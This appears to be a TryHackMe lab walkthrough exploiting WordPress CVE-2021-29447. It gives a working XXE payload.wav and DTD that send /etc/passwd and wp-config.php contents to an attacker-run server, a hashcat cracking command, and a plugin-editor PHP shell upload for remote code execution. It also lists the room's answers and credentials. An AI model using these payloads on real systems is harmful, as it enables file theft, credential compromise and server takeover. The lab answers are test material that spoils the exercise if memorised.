Wordpress: CVE-2021-29447 Tryhackme Room Walkthrough

 

 

 

Vulnerability allows an authenticated user with low privileges to upload a malicious WAV file that could lead to remote arbitrary file disclosure and server-side request forgery (SSRF). 

 

TASK 2

Use the vulnerability CVE-2021-29447 to read the WordPress configuration file?

 

                                            No Answer Needed

 

Based on the results of #1, what is the name of the database for WordPress?

 

first, we log in to WordPress, creds are given

 

user test-corp

pass test

 

 

successfully logged 

 

 

  then upload our payload.wav

 

 

Steps to create payload.wav

 

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.17.12.54:9080/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

 

paylod.dtd

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.17.12.54:9080/?p=%file;'>" >

then start PHP server

php -S 0.0.0.0:9080

if you didn't have PHP-CLI install this using this command Sudo apt install php7.4-cli

 then upload this on WordPress

you get responses back like these(base64 encoded strings)

decode the string you get /etc/passwd of this system

i saved these bas64 strings in cat file so

 

cat cat |base64 -d

 

we need creds, so /wp-config.php contains WordPress user and passwords so this time we read the wp-config.php file

 

just change /etc/passwd to ../wp-config.php 

 

 payload.wav(change ip)

 RIFF�WAVEiXML{<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM 'http://10.17.12.54:9080/payload.dtd'>%remote;%init;%trick;]>  

payload.dtd(change ip)

 <!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../wp-settings.php">  
 <!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.17.12.54:9080/?p=%file;'>" >  

do previously we done

start php sevrer php -S 0.0.0.0:9080

upload our payload.wav it return base64 encoded string

decode this

here is the code to decode the base64(wp-config.php)

 

 <?php echo zlib_decode(base64_decode('base64here')); ?>  

 

uff! we got wp-config.php

Based on the results of #1, what is the name of the database for WordPress?

 wordpressdb2

 

Based on the results of #1, what are the credentials you found?

thedarktangent:sUp3rS3cret132

 

Enumerate and identify what is the DBMS installed on the server?

MySQL

 

Based on the results of #4, what is the DBMS version installed on the server?

5.7.33

Based on the results of #4, what port is the DBMS running on?

3306  

 
and we got a cred of MySQL

Let's login via MySQL

use wordpressdb2;

select * from wptry_users;

Compromise the DBMS, What is the encrypted password located in the WordPress users table with id 1??

$P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1

 crack the hash 

I am using hashcat to crack this hash, you also can use john 

 command 

hashcat -O -m 400 -a 0 hash /opt/rockyou.txt

Based on the results of #7, What is the password in plain text?

teddybear

 lets login WordPress using these creds

corp-001   teddybear

then upload your PHP  in the plugin editor

then activate this plugin and access the file 

http://10.10.81.82 /wp-content/plugins/akismet/akismet.php

you get the shell back :) 

if you need more detail about WordPress shell upload?

refer this shell-upload-wp

other way refer

We Done it :)